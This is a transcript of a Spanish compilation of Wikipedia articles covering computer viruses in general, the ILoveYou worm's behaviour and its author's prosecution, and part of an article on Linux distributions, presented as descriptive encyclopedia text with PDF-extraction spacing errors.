Virus informático

148
Contenidos Artículos Virus informático 1 ILoveYou 5 Distribución Linux 7 Servidor 14 Ingeniería social (seguridad informática) 16 Blaster 18 Ataque de denegación de servicio 19 Ping de la muerte 22 Anonymous 23 Nuke 27 Flags 28 Ataque smurf 28 Antivirus 29 Ciencias de la computación 33 Cortafuegos (informática) 38 Bastion host 43 Lista de control de acceso 46 Firestarter 47 Unified Threat Management 48 RFC 2979 49 ZoneAlarm 49 Uncomplicated Firewall 52 Gufw 53 Ipfw 55 PF (software) 55 Cracking (software) 58 Crack informático 58 Cracker 59 Password cracking 61 Razor 1911 61 Desbordamiento de búfer 63 Escáner de puertos 68 Exploit 69 Seguridad informática 71

Transcript of Virus informático

Page 1: Virus informático

ContenidosArtículos

Virus informático 1ILoveYou 5Distribución Linux 7Servidor 14Ingeniería social (seguridad informática) 16Blaster 18Ataque de denegación de servicio 19Ping de la muerte 22Anonymous 23Nuke 27Flags 28Ataque smurf 28Antivirus 29Ciencias de la computación 33Cortafuegos (informática) 38Bastion host 43Lista de control de acceso 46Firestarter 47Unified Threat Management 48RFC 2979 49ZoneAlarm 49Uncomplicated Firewall 52Gufw 53Ipfw 55PF (software) 55Cracking (software) 58Crack informático 58Cracker 59Password cracking 61Razor 1911 61Desbordamiento de búfer 63Escáner de puertos 68Exploit 69Seguridad informática 71

Page 2: Virus informático

Inseguridad informática 78Desbordamiento de pila 80Desbordamiento de montículo 80Shellcode 80Error de software 83Hacker 85Melissa (informática) 88Analizador de paquetes 92Phishing 93Pharming 100Cross-site scripting 102Spam 106Troyano (informática) 114War dialing 118Memoria de acceso aleatorio 118Jerarquía de memoria 125Controlador de memoria 126Circuito integrado 127Circuito impreso 132

ReferenciasFuentes y contribuyentes del artículo 140Fuentes de imagen, Licencias y contribuyentes 144

Licencias de artículosLicencia 146

Page 3: Virus informático

Virus informático 1

Virus informáticoUn virus informático es un malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin elpermiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otrosinfectados con el código de este. Los virus pueden destruir, de manera intencionada, los datos almacenados en uncomputadora, aunque también existen otros más inofensivos, que solo se caracterizan por ser molestos.Los virus informáticos tienen, básicamente, la función de propagarse a través de un software, no se replican a símismos porque no tienen esa facultad[cita requerida] como el gusano informático, son muy nocivos y algunoscontienen además una carga dañina (payload) con distintos objetivos, desde una simple broma hasta realizar dañosimportantes en los sistemas, o bloquear las redes informáticas generando tráfico inútil.El funcionamiento de un virus informático es conceptualmente simple. Se ejecuta un programa que está infectado, enla mayoría de las ocasiones, por desconocimiento del usuario. El código del virus queda residente (alojado) en lamemoria RAM de la computadora, incluso cuando el programa que lo contenía haya terminado de ejecutarse. Elvirus toma entonces el control de los servicios básicos del sistema operativo, infectando, de manera posterior,archivos ejecutables que sean llamados para su ejecución. Finalmente se añade el código del virus al programainfectado y se graba en el disco, con lo cual el proceso de replicado se completa.

HistoriaEl primer virus atacó a una máquina IBM Serie 360 (y reconocido como tal). Fue llamado Creeper, creado en 1972.Este programa emitía periódicamente en la pantalla el mensaje: «I'm a creeper... catch me if you can!» (¡Soy unaenredadera... agárrame si puedes!). Para eliminar este problema se creó el primer programa antivirus denominadoReaper (cortadora).Sin embargo, el término virus no se adoptaría hasta 1984, pero éstos ya existían desde antes. Sus inicios fueron enlos laboratorios de Bell Computers. Cuatro programadores (H. Douglas Mellory, Robert Morris, Victor Vysottsky yKen Thompson) desarrollaron un juego llamado Core War, el cual consistía en ocupar toda la memoria RAM delequipo contrario en el menor tiempo posible.Después de 1984, los virus han tenido una gran expansión, desde los que atacan los sectores de arranque de disqueteshasta los que se adjuntan en un correo electrónico.

Virus informáticos y sistemas operativosLos virus informáticos afectan en mayor o menor medida a casi todos los sistemas más conocidos y usados en laactualidad.Cabe aclarar que un virus informático mayoritariamente atacará sólo el sistema operativo para el que fuedesarrollado, aunque ha habido algunos casos de virus multiplataforma.

MS-WindowsLas mayores incidencias se dan en el sistema operativo Windows debido, entre otras causas, a:• Su gran popularidad, como sistema operativo, entre los computadores personales, PC. Se estima que, en 2007, un

90% de ellos usaba Windows.[cita requerida] Esta popularidad basada en la facilidad de uso sin conocimiento previoalguno, motiva a los creadores de software malicioso a desarrollar nuevos virus; y así, al atacar sus puntosdébiles, aumentar el impacto que generan.

• Falta de seguridad en esta plataforma (situación a la que Microsoft está dando en los últimos años mayor prioridad e importancia que en el pasado). Al ser un sistema muy permisivo con la instalación de programas ajenos a éste, sin requerir ninguna autentificación por parte del usuario o pedirle algún permiso especial para ello

Page 4: Virus informático

Virus informático 2

en los sistemas más antiguos (en los Windows basados en NT se ha mejorado, en parte, este problema). A partirde la inclusión del Control de Cuentas de Usuario en Windows Vista o Windows 7, y siempre y cuando no sedesactive, se ha solucionado este problema.

• Software como Internet Explorer y Outlook Express, desarrollados por Microsoft e incluidos de formapredeterminada en las últimas versiones de Windows, son conocidos por ser vulnerables a los virus ya que éstosaprovechan la ventaja de que dichos programas están fuertemente integrados en el sistema operativo dando accesocompleto, y prácticamente sin restricciones, a los archivos del sistema. Un ejemplo famoso de este tipo es el virusILOVEYOU, creado en el año 2000 y propagado a través de Outlook.

• La escasa formación de un número importante de usuarios de este sistema, lo que provoca que no se tomenmedidas preventivas por parte de estos, ya que este sistema está dirigido de manera mayoritaria a los usuarios noexpertos en informática. Esta situación es aprovechada constantemente por los programadores de virus.

Unix y derivadosEn otros sistemas operativos como las distribuciones GNU/Linux, BSD, OpenSolaris, Solaris, Mac OS X y otrosbasados en Unix las incidencias y ataques son prácticamente inexistentes. Esto se debe principalmente a:• Tradicionalmente los programadores y usuarios de sistemas basados en Unix han considerado la seguridad como

una prioridad por lo que hay mayores medidas frente a virus, tales como la necesidad de autenticación por partedel usuario como administrador o root para poder instalar cualquier programa adicional al sistema.

• Los directorios o carpetas que contienen los archivos vitales del sistema operativo cuentan con permisosespeciales de acceso, por lo que no cualquier usuario o programa puede acceder fácilmente a ellos paramodificarlos o borrarlos. Existe una jerarquía de permisos y accesos para los usuarios.

• Relacionado al punto anterior, a diferencia de los usuarios de Windows, la mayoría de los usuarios de sistemasbasados en Unix no pueden normalmente iniciar sesiones como usuarios "administradores' o por el superusuarioroot, excepto para instalar o configurar software, dando como resultado que, incluso si un usuario noadministrador ejecuta un virus o algún software malicioso, éste no dañaría completamente el sistema operativo yaque Unix limita el entorno de ejecución a un espacio o directorio reservado llamado comúnmente home. Aunque apartir de Windows Vista, se pueden configurar las cuentas de usuario de forma similar.

• Estos sistemas, a diferencia de Windows, son usados para tareas más complejas como servidores que por logeneral están fuertemente protegidos, razón que los hace menos atractivos para un desarrollo de virus o softwaremalicioso.

• En el caso particular de las distribuciones basadas en GNU/Linux y gracias al modelo colaborativo, las licenciaslibres y debido a que son más populares que otros sistemas Unix, la comunidad aporta constantemente y en unlapso de tiempo muy corto actualizaciones que resuelven bugs y/o agujeros de seguridad que pudieran seraprovechados por algún malware.

CaracterísticasDado que una característica de los virus es el consumo de recursos, los virus ocasionan problemas tales como:pérdida de productividad, cortes en los sistemas de información o daños a nivel de datos.Una de las características es la posibilidad que tienen de diseminarse por medio de replicas y copias. Las redes en laactualidad ayudan a dicha propagación cuando éstas no tienen la seguridad adecuada.Otros daños que los virus producen a los sistemas informáticos son la pérdida de información, horas de paradaproductiva, tiempo de reinstalación, etc.Hay que tener en cuenta que cada virus plantea una situación diferente.

Page 5: Virus informático

Virus informático 3

Métodos de propagaciónExisten dos grandes clases de contagio. En la primera, el usuario, en un momento dado, ejecuta o acepta de formainadvertida la instalación del virus. En la segunda, el programa malicioso actúa replicándose a través de las redes. Eneste caso se habla de gusanos.En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientosanómalos o imprevistos. Dichos comportamientos pueden dar una pista del problema y permitir la recuperación delmismo.Dentro de las contaminaciones más frecuentes por interacción del usuario están las siguientes:•• Mensajes que ejecutan automáticamente programas (como el programa de correo que abre directamente un

archivo adjunto).• Ingeniería social, mensajes como ejecute este programa y gane un premio, o, más comúnmente: Haz 2 clics y

gana 2 tonos para móvil gratis..•• Entrada de información en discos de otros usuarios infectados.•• Instalación de software modificado o de dudosa procedencia.En el sistema Windows puede darse el caso de que la computadora pueda infectarse sin ningún tipo de intervencióndel usuario (versiones Windows 2000, XP y Server 2003) por virus como Blaster, Sasser y sus variantes por elsimple hecho de estar la máquina conectada a una red o a Internet. Este tipo de virus aprovechan una vulnerabilidadde desbordamiento de buffer y puertos de red para infiltrarse y contagiar el equipo, causar inestabilidad en elsistema, mostrar mensajes de error, reenviarse a otras máquinas mediante la red local o Internet y hasta reiniciar elsistema, entre otros daños. En las últimas versiones de Windows 2000, XP y Server 2003 se ha corregido esteproblema en su mayoría.

Métodos de protección y tiposLos métodos para disminuir o reducir los riesgos asociados a los virus pueden ser los denominados activos o pasivos.

Activos• Antivirus: son programas que tratan de descubrir las trazas que ha dejado un software malicioso, para detectarlo y

eliminarlo, y en algunos casos contener o parar la contaminación. Tratan de tener controlado el sistema mientrasfunciona parando las vías conocidas de infección y notificando al usuario de posibles incidencias de seguridad.Por ejemplo, al verse que se crea un archivo llamado Win32.EXE.vbs en la carpeta C:\Windows\%System32%\ ensegundo plano, ve que es comportamiento sospechoso, salta y avisa al usuario.

• Filtros de ficheros: consiste en generar filtros de ficheros dañinos si el computador está conectado a una red. Estosfiltros pueden usarse, por ejemplo, en el sistema de correos o usando técnicas de firewall. En general, este sistemaproporciona una seguridad donde no se requiere la intervención del usuario, puede ser muy eficaz, y permitiremplear únicamente recursos de forma más selectiva.

Page 6: Virus informático

Virus informático 4

Pasivos•• Evitar introducir a tu equipo medios de almacenamiento extraíbles que consideres que pudieran estar infectados

con algún virus.•• No instalar software "pirata", pues puede tener dudosa procedencia.•• No abrir mensajes provenientes de una dirección electrónica desconocida.•• No aceptar e-mails de desconocidos.•• Informarse y utilizar sistemas operativos más seguros.•• No abrir documentos sin asegurarnos del tipo de archivo. Puede ser un ejecutable o incorporar macros en su

interior.

Tipos de virus e imitacionesExisten diversos tipos de virus, varían según su función o la manera en que éste se ejecuta en nuestra computadoraalterando la actividad de la misma, entre los más comunes están:• Troyano: Consiste en robar información o alterar el sistema del hardware o en un caso extremo permite que un

usuario externo pueda controlar el equipo.• Gusano: Tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema

operativo que generalmente son invisibles al usuario.• Bombas lógicas o de tiempo: Son programas que se activan al producirse un acontecimiento determinado. La

condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o ciertas condiciones técnicas(Bombas Lógicas). Si no se produce la condición permanece oculto al usuario.

• Hoax: Los hoax no son virus ni tienen capacidad de reproducirse por si solos. Son mensajes de contenido falsoque incitan al usuario a hacer copias y enviarla a sus contactos. Suelen apelar a los sentimientos morales ("Ayudaa un niño enfermo de cáncer") o al espíritu de solidaridad ("Aviso de un nuevo virus peligrosísimo") y, encualquier caso, tratan de aprovecharse de la falta de experiencia de los internautas novatos.

• Joke: Al igual que los hoax, no son virus, pero son molestos, un ejemplo: una página pornográfica que se muevede un lado a otro, y si se le llega a dar a errar es posible que salga una ventana que diga: OMFG!! No se puedecerrar!

Acciones de los virusAlgunas de las acciones de algunos virus son:•• Unirse a un programa instalado en el computador permitiendo su propagación.•• Mostrar en la pantalla mensajes o imágenes humorísticas, generalmente molestas.•• Ralentizar o bloquear el computador.•• Destruir la información almacenada en el disco, en algunos casos vital para el sistema, que impedirá el

funcionamiento del equipo.•• Reducir el espacio en el disco.•• Molestar al usuario cerrando ventanas, moviendo el ratón...

Page 7: Virus informático

Virus informático 5

Enlaces externos• Wikimedia Commons alberga contenido multimedia sobre Virus informático. Commons• Centro de Respuesta a Incidentes de Seguridad (INTECO-CERT) del Gobierno de España - Virus y el software

malicioso [1]

• Antivirus [2] en Open Directory Project• Linux y virus, no sólo cuestión de popularidad [3] en Kriptópolis.• Enciclopedia de virus informáticos [4]

Referencias[1] http:/ / cert. inteco. es/ homeVirusAct/ Actualidad/ Actualidad_Virus/ ?postAction=getHomeValuesVirusAct[2] http:/ / www. dmoz. org/ World/ Espa%C3%B1ol/ Computadoras/ Seguridad/ Antivirus/[3] http:/ / www. kriptopolis. org/ linux-virus-popularidad[4] http:/ / www. enciclopediavirus. com/ home/ index. php

ILoveYoui love (o VBS/LoveLetter) es un gusano escrito en VBScript. En mayo del 2000 infectó aproximadamente 50millones de computadores provocando pérdidas de más de 5.500 millones de dólares.

Arquitectura del virus

ILoveYou aprovechaba la libreta de contactos del computadorafectado para propagarse, logrando una enorme capacidad de

difusión.

El virus sobrescribe con su código los archivos conextensiones .VBS y .VBE. Elimina los archivos conextensiones .JS, .JSE, .CSS, .WSH, .SCT y .HTA, ycrea otros con el mismo nombre y extensión .VBS en elque introduce su código. También localiza los archivoscon extensión .JPG, .JPEG, .MP3 y .MP2, los elimina,y crea otros donde el nuevo nombre está formado por elnombre y la extensión anterior más VBS como nuevaextensión real.[]

VBS/LoveLetter llega al usuario en un e-mail que tienepor Asunto: 'ILOVEYOU' e incluye un fichero llamado'LOVE-LETTER-FOR-YOU. TXT.vbs'. Cuando estevirus se ejecuta, crea varias copias de sí mismo en eldisco duro con los siguientes nombres:

MSKernel32.vbs (en el directorioSYSTEM de Windows) Win32DLL.vbs(en el directorio de instalación de Windows) LOVE-LETTER-FOR-YOU.TXT.vbs (en el directorioSYSTEM de Windows)

Tras esto, el virus crea varias entradas en el registro de configuración de Windows.VBS/LovelLetter comprueba, en el directorio SYSTEM de Windows, la existencia del fichero WinFAT32.exe. Si loencuentra genera un número aleatorio entre 1 y 5, y dependiendo del número que resulte, crea la entrada de registro'HKCU\Software\Microsoft\InternetExplorer\Main\Start, a la que le asigna un valor para bajarse el ficheroWIN-BUGSFIX. EXE.[]

Page 8: Virus informático

ILoveYou 6

Tras realizar esta operación, el virus genera, en el directorio SYSTEM de Windows, el ficheroLOVE-LETTER-FOR-YOU.HTM, que será el que posteriormente envíe por IRC. Después, el gusano se envía atodas las direcciones que encuentra en el libro de direcciones de Microsoft Outlook.Cuando ya se ha enviado por correo, VBS/LoveLetter realiza su efecto destructivo. En concreto, busca en el path deldisco duro y en el de todas las unidades de red archivos con extensión vbs, vbe, js, jse, css, wsh, sct y hta. Cuandolos encuentra, los sobreescribe con su código, modifica su tamaño y les cambia la extensión a VBS, lo que conllevala pérdida de toda la información contenida en los archivos. Si los archivos que encuentra poseen extensión jpg ojpeg también los sobreescribe, cambia su tamaño y les añade, al final la extensión VBS (quedando como jpg.vbs ojpeg.vbs).[]

Si VBS/LoveLetter encuentra un fichero con extensión mp3 o mp2 genera una copia de sí mismo con el nombre delarchivo encontrado y añade la extensión VBS ocultando los ficheros originales. El virus también comprueba si en eldirectorio en el que se está realizando la búsqueda se encuentra alguno de los siguientes ficheros: mirc32.exe,mlinnk32.exe, mirc.ini, scrip.ini o mirc.hlp. Si los encuentra crea el fichero 'script.ini', que será el encargado demandar por IRC el fichero LOVE-LETTER-FOR-YOU.HTM a todo aquél que se conecte al mismo canal que él.

Persecución de los autores

El Parlamento Británico fue una de las tantas instituciones afectadaspor ILoveYou.

ILoveYou apareció en internet el 4 de mayo de 2000. Elvirus se presentó en un principio en forma de mensajede correo con el asunto "ILOVEYOU" y un archivoadjunto con el nombre"LOVE-LETTER-FOR-YOU.TXT.vbs", que al serabierto, infectaba el ordenador y se autoenviaba a lasdirecciones de correo que el usuario tuviera en suagenda de direcciones. Comenzó en Filipinas y le bastóun solo día para propagarse por todo el mundo,infectando en Hong Kong, Europa y luego en losEstados Unidos.[1]

Cinco días más tarde, se reconocían 18 mutaciones delvirus.[2] Al multiplicarse explosivamente, este gusanocondujo a Internet al colapso.

El día 8 de mayo, Reonel Ramones, un empleado bancario de 27 años, fue detenido en Manila por la OficinaNacional de Investigaciones (NBI) de la policía de Filipinas y acusado preliminarmente de vulnerar la LeyNormativa sobre Instrumentos de Acceso, cuyo principal objetivo es proteger las contraseñas para las tarjetas decrédito. Sin embargo, fue liberado al día siguiente por orden de la justicia filipina, al carecer de pruebas suficientespara mantenerlo bajo custodia.[3] La acusación se había fundamentado en una queja de un proveedor de servicios deInternet de que el virus se había originado en el departamento en que Ramones vivía con su compañera, Irene deGuzmán, y el hermano de ésta, Onel de Guzmán.[4] Todos ellos habían estudiado en el Colegio de ComputaciónAMA de Manila (AMACC).

Tres días más tarde, el 11 de mayo, Onel de Guzmán se presentó con su abogado en conferencia de prensa parareconocer que pudo haber trasmitido el virus "accidentalmente".[5] Tomando como base los programas encontradosen el departamento de Guzmán y Ramones por la policía, se dijo en un primer momento que el virus había sidoelaborado por un grupo de estudiantes del Colegio de Computación AMA denominado "GRAMMERSoft", grupo alcual pertenecía Guzmán.[6] Sin embargo, éste luego confesaría que había creado el virus por sí solo, y quecorrespondía a la aplicación de sus tesis: una guía sobre cómo robar códigos secretos a través de Internet o cómointroducirse en un ordenador ajeno y tomar su control.[7]

Page 9: Virus informático

ILoveYou 7

Pese a que en un principio la Oficina Nacional de Investigaciones (NBI) imputó cargos a Guzmán tomando comobase la Ley Normativa sobre Instrumentos de Acceso,[8] el 21 de agosto la justicia de Filipinas los desestimó todos,puesto que esta Ley no se aplicaba a la intrusión en las computadoras.[9] De hecho, en ese momento Filipinas carecíade leyes sobre delitos informáticos, y por lo mismo, a Guzmán se le retiraron todos los cargos.

Efectos y daños causadosEl virus se propagó rápidamente por todo el mundo. El 13 de mayo de 2000 se habían reportado 50 millones deinfecciones alrededor del globo,[10] cifra que representaba al 10 por ciento del total de computadores con conexión aInternet en esa época. El virus atacó a El Pentágono, la CIA, el Parlamento Británico y las grandes empresas. EnEspaña, por ejemplo, el 80% de las empresas sufrieron los ataques del virus.[11] Se estimó que el monto de los dañoscausados fue entre 5.5 a 8.7 miles de millones de dólares,[12] derivados principalmente del trabajo de eliminación delos gusanos de los sistemas infectados.Por otra parte, este hecho dejó en manifiesto en Filipinas la necesidad de contar con una legislación regulatoria de laactividad en Internet. Por lo mismo, el 14 de junio de 2000 se dictó la Ley N°8.792, que actualmente, en su Sección33 sanciona la introducción de virus computacionales y otros con el objetivo de dañar mensajes de datos ydocumentos electrónicos. Con todo, no pudo ser aplicada en contra de Onel de Guzmán, puesto que el hechotipificado (la liberación del virus) había sido ejecutado antes de la entrada en vigencia de esta ley penal.

Referencias

Distribución Linux

Arquitectura de distribuciones Linux con componentes GNU(Concepto)

Una distribución Linux (coloquialmente llamadadistro) es una distribución de software basada en elnúcleo Linux que incluye determinados paquetes desoftware para satisfacer las necesidades de un grupoespecífico de usuarios, dando así origen a edicionesdomésticas, empresariales y para servidores. Por logeneral están compuestas, total o mayoritariamente, desoftware libre, aunque a menudo incorporanaplicaciones o controladores propietarios.

Además del núcleo Linux, las distribuciones incluyenhabitualmente las bibliotecas y herramientas delproyecto GNU y el sistema de ventanas X WindowSystem. Dependiendo del tipo de usuarios a los que ladistribución esté dirigida se incluye también otro tipode software como procesadores de texto, hoja decálculo, reproductores multimedia, herramientasadministrativas, etc. En el caso de incluir herramientasdel proyecto GNU, también se utiliza el términodistribución GNU/Linux.

Existen distribuciones que están soportadas comercialmente, como Fedora (Red Hat), openSUSE (Novell), Ubuntu(Canonical Ltd.), Mandriva, y distribuciones mantenidas por la comunidad como Debian y Gentoo. Aunque hayotras distribuciones que no están relacionadas con alguna empresa o comunidad, como es el caso de Slackware.

Page 10: Virus informático

Distribución Linux 8

Historia

Árbol de vida dehuevo Linux [1], línea

del tiemporepresentando el

desarrollo de variasdistribuciones Linux

Antes de que surgieran las primeras distribuciones, un usuario de Linux debía ser algoexperto en Unix; no solo debía conocer qué bibliotecas y ejecutables necesitaba para iniciarel sistema y que funcionase, sino también los detalles importantes que se requieren en lainstalación y configuración de los archivos en el sistema.

Las distribuciones Linux comenzaron a surgir poco después de que el núcleo Linux fuerautilizado por otros programadores además de los creadores originales. Existía mayor interésen desarrollar un sistema operativo que en desarrollar aplicaciones, interfaces para losusuarios o un paquete de software conveniente.

Entre las distribuciones más antiguas se incluían:•• Dos discos denominados H J Lu's «Boot-root» con el núcleo y un mínimo de herramientas

para utilizar.• MCC Interim Linux, que se podía descargar en un servidor público FTP de la Universidad

de Mánchester en febrero de 1992.• TAMU, creado por entusiastas de la Universidad de Texas A&M al mismo tiempo que

SLS• SLS (Softlanding Linux System).• Yggdrasil Linux creó el primer CD-ROM de una distribución Linux.SLS no estuvo bien mantenida; así pues, Patrick Volkerding lanzó una distribución basada enSLS a la que llamó Slackware; lanzada el 16 de julio de 1993.[2] Esta es la distribución másantigua que está en desarrollo activo.

Los usuarios vieron en Linux una alternativa a los sistemas operativos DOS, MicrosoftWindows en la plataforma PC, Mac OS en Apple Macintosh y las versiones de uso bajolicencia (de pago) de UNIX. La mayoría de estos primeros usuarios se habían familiarizadocon el entorno UNIX en sus trabajos o centros de estudios. Estos adoptaron GNU/Linux porsu estabilidad, reducido (o nulo) coste y por la disponibilidad del código fuente del softwareincluido.

Las distribuciones eran originalmente una cuestión de comodidad para el usuario medio,evitándole la instalación (y en muchos casos compilación) por separado de paquetes de uso común, pero hoy se hanpopularizado incluso entre los expertos en este tipo de sistemas operativos (UNIX/Linux). Si bien, históricamente,Linux estuvo mejor posicionado en el mercado de los servidores, distribuciones centradas en la facilidad deinstalación y uso, tales como Fedora, Mandriva, OpenSuSE, Knoppix y Ubuntu, entre otras, han logrado una mayoraceptación en el mercado doméstico.

ComponentesEl conjunto típico de una distribución Linux contiene un núcleo, herramientas y bibliotecas, software adicional,documentación, un sistema de ventanas, un administrador de ventanas y un entorno de escritorio, este suele serGNOME o KDE. Gran parte del software incluido es de fuente abierta o software libre y distribuido por susdesarrolladores tanto en binario compilado como en forma de código fuente, permitiendo a sus usuarios modificar ocompilar el código fuente original si lo desean. Muchas distribuciones incorporan software privativo, no disponibleen forma de código fuente.Muchas distribuciones proveen un sistema de instalación gráfica como lo hacen otros sistemas operativos modernos. Distribuciones independientes como Gentoo Linux, T2 y Linux From Scratch proveen el código fuente de todo el software y solo incluyen los binarios del núcleo, herramientas de compilación y de un instalador; el instalador

Page 11: Virus informático

Distribución Linux 9

compila todo el software para el CPU específico de la PC del usuario.

Gestión de paquetesLas distribuciones están divididas en «paquetes». Cada paquete contiene una aplicación especifica o un servicio.Ejemplos de paquetes son una biblioteca para manejar el formato de imagen PNG, una colección de tipografías o unnavegador web.El paquete es generalmente distribuido en su versión compilada y la instalación y desinstalación de los paquetes escontrolada por un sistema de gestión de paquetes en lugar de un simple gestor de archivos. Cada paquete elaboradopara ese sistema de paquetes contiene meta-información tal como fecha de creación, descripción del paquete y susdependencias. El sistema de paquetes analiza esta información para permitir la búsqueda de paquetes, actualizar laslibrerías y aplicaciones instaladas, revisar que todas las dependencias se cumplan y obtenerlas si no se cuenta conellas de manera automática.Algunos de los sistemas de paquetes más usados son:• RPM, creado por Red Hat y usado por un gran número de distribuciones de Linux, es el formato de paquetes del

Linux Standard Base. Originalmente introducido por Red Hat, pero ahora se usa en muchas distribuciones, comopor ejemplo Mandriva.

• Deb, paquetes Debian, originalmente introducidos por Debian, pero también utilizados por otros como Knoppix yUbuntu.

• .tgz, usado por Slackware, empaqueta el software usando tar y gzip. Pero, además, hay algunas herramientasde más alto nivel para tratar con este formato: slapt-get, slackpkg y swaret.

• Ebuilds, archivo que contiene información acerca de cómo obtener, compilar e instalar un paquete en el sistemaPortage de Gentoo Linux con el comando emerge. Generalmente, estas instalaciones se basan en la compilaciónde fuentes, aunque algunos paquetes binarios se pueden instalar de esta manera.

• Pacman, para Arch Linux, usa binarios precompilados distribuidos en un fichero .pkg.tar.gz ó.pkg.tar.xz.

• PET, utilizado por Puppy Linux, sus derivados y Quirky, su proyecto hermano.Aunque las distribuciones casi siempre vienen con mucha mayor cantidad de software que los sistemas propietarios,en ocasiones algunos usuarios pueden instalar software que no fue incluido en la distribución. Un ejemplo podría serel instalar una versión experimental de alguna de las aplicaciones de la distribución o alguna alternativa (comopodría ser utilizar una aplicación de KDE dentro de GNOME o viceversa). Si el software es distribuido solo enforma de código fuente, requerirá ser compilado por el ordenador. Sin embargo, si el programa es compilado, elpaquete no será registrado por el gestor de paquetes y por lo tanto no podrá ser controlado por él. Esto significa queel administrador del equipo tendrá que tomar medidas adicionales para mantener el software actualizado. El gestorde paquetes no lo podrá hacer automáticamente.La mayor parte de las distribuciones instalan los paquetes, incluyendo el núcleo Linux y otras piezas fundamentalesdel sistema operativo con una configuración preestablecida. Esto hace la instalación más sencilla, especialmente paralos usuarios nuevos, pero no es siempre aceptable, pues hay programas que deben de ser cuidadosamenteconfigurados para que sean funcionales, para que operen correctamente con otra aplicación o para que su seguridadsea robusta. En estos casos, los administradores se ven obligados a invertir tiempo reconfigurando y revisandosoftware soportado por la distribución.En otras distribuciones la instalación puede llegar a ser muy lenta, pues es posible ajustar y configurar la mayor parteo la totalidad del software incluido en la distribución. No todas lo hacen. Algunas ofrecen herramientas deconfiguración para ayudar en el proceso.Es también posible armar un sistema a la medida en su totalidad, descartando incluso el uso de una distribución. Lo primero que hay que hacer es generar un sistema base que permita conseguir, compilar, configurar e instalar el código fuente. Generar los binarios de este sistema base requerirá de otra máquina que sea capaz de generar los

Page 12: Virus informático

Distribución Linux 10

binarios para el dispositivo deseado, esto puede ser alcanzado por medio de una compilación cruzada. Ver porejemplo Linux from Scratch.

Tipos y tendenciasEn general, las distribuciones Linux pueden ser:•• Comerciales o no comerciales.• Ser completamente libres o incluir software privativo.•• Diseñadas para uso en el hogar o en las empresas.•• Diseñadas para servidores, escritorios o dispositivos empotrados.•• Orientadas a usuarios regulares o usuarios avanzados.• De uso general o para dispositivos altamente especializados, como un cortafuegos, un enrutador o un cluster

computacional.•• Diseñadas e incluso certificadas para un hardware o arquitectura específicos.• Orientadas hacia grupos en específico, por ejemplo a través de la internacionalización y localización del lenguaje,

o por la inclusión de varios paquetes para la producción musical o para computación científica.•• Configuradas especialmente para ser más seguras, completas, portables o fáciles de usar.•• Soportadas bajo distintos tipos de hardware.La diversidad de las distribuciones Linux es debido a cuestiones técnicas, de organización y de puntos de vistadiferentes entre usuarios y proveedores. El modo de licenciamiento del software libre permite que cualquier usuariocon los conocimientos e interés suficiente pueda adaptar o diseñar una distribución de acuerdo a sus necesidades.

Distribuciones que no requieren instalación (Live CD)Una distribución live o Live CD o Live DVD, más genéricamente Live Distro, (traducido en ocasiones como CDvivo o CD autónomo), es una distribución almacenada en un medio extraíble, tradicionalmente un CD o un DVD(de ahí sus nombres), que puede ejecutarse desde éste sin necesidad de instalarlo en el disco duro de unacomputadora, para lo cual usa la memoria RAM como disco duro virtual y el propio medio como sistema dearchivos.Cuando el sistema operativo es ejecutado por un dispositivo de sólo lectura como un CD o DVD, el usuario necesitautilizar una memoria USB o un disco duro instalado en la máquina para conservar su información entre sesiones. Lainformación del sistema operativo es usualmente cargada en la memoria RAM.La portabilidad de este tipo de distribuciones las hace ideales para ser utilizadas en demostraciones, operaciones derecuperación, cuando se utiliza una máquina ajena o como medio de instalación para una distribución estándar.Actualmente, casi todas las distribuciones tienen una versión CD/DVD autónomo o «vivo».

Desarrollo

ComunidadLa mayoría de las distribuciones están, en mayor o menor medida, desarrolladas y dirigidas por sus comunidades dedesarrolladores y usuarios. En algunos casos están dirigidas y financiadas completamente por la comunidad, comoocurre con Debian GNU/Linux, mientras que otras mantienen una distribución comercial y una versión de lacomunidad, como hace RedHat con Fedora, o SuSE con OpenSuSE.En muchas ciudades y regiones, asociaciones locales conocidas como grupos de usuarios promueven este sistemaoperativo y el software libre. Suelen ofrecer conferencias, talleres o soporte técnico de forma gratuita o introduccióna la instalación de Linux para nuevos usuarios.

Page 13: Virus informático

Distribución Linux 11

En las distribuciones y otros proyectos de software libre y código abierto son muy comunes las salas de chat IRC ygrupos de noticias. Los foros también son comunes, sobre todo en el soporte a usuarios, y las listas de correo suelenser el medio principal para discutir sobre el desarrollo, aunque también se utilizan como medio de soporte al usuario.

Escala de desarrolloUn estudio sobre la distribución Red Hat 7.1 reveló que ésta en particular posee más de 30 millones de líneas decódigo real. Utilizando el modelo de cálculo de costos COCOMO, puede estimarse que esta distribución requeriría8.000 programadores por año para su desarrollo. De haber sido desarrollado por medios convencionales de códigocerrado, hubiera costado más de mil millones de dólares en los Estados Unidos.[]

La mayor parte de su código (71%) pertenecía al lenguaje C, pero fueron utilizados muchos otros lenguajes para sudesarrollo, incluyendo C++, Bash, Lisp, Ensamblador, Perl, Fortran y Python.Además, la licencia predominante en alrededor de la mitad de su código total (contado en líneas de código) fue laGPL en su versión 2.El núcleo Linux contenía entonces 2,4 millones de líneas de código, lo que representaba el 8% del total.En un estudio posterior[3] se realizó el mismo análisis para Debian GNU/Linux versión 2.2. Esta distribucióncontenía más de 55 millones de líneas de código fuente, y habría costado 1.900 millones de dólares (año 2000) eldesarrollo por medios convencionales (no libres); el núcleo Linux en octubre de 2003 tiene unas 5,5 millones delíneas más.

Ejemplos

Distribuciones popularesEntre las distribuciones Linux más populares se incluyen:• Arch Linux, una distribución basada en el principio KISS, con un sistema de desarrollo continuo entre cada

versión (no es necesario volver a instalar todo el sistema para actualizarlo).• Debian, una distribución mantenida por una red de desarrolladores voluntarios con un gran compromiso por los

principios del software libre.• Fedora, una distribución lanzada por Red Hat para la comunidad.• Ubuntu, una popular distribución para escritorio basada en Debian y mantenida por Canonical.• Kubuntu, la versión en KDE de Ubuntu.• Linux Mint, una popular distribución derivada de Ubuntu.• Chakra project, una popular distribución para escritorio, inicialmente basada en Arch Linux, actualmente se

encuentra en un desarrollo independiente.• openSUSE, originalmente basada en Slackware es patrocinada actualmente por la compañía SUSE (The

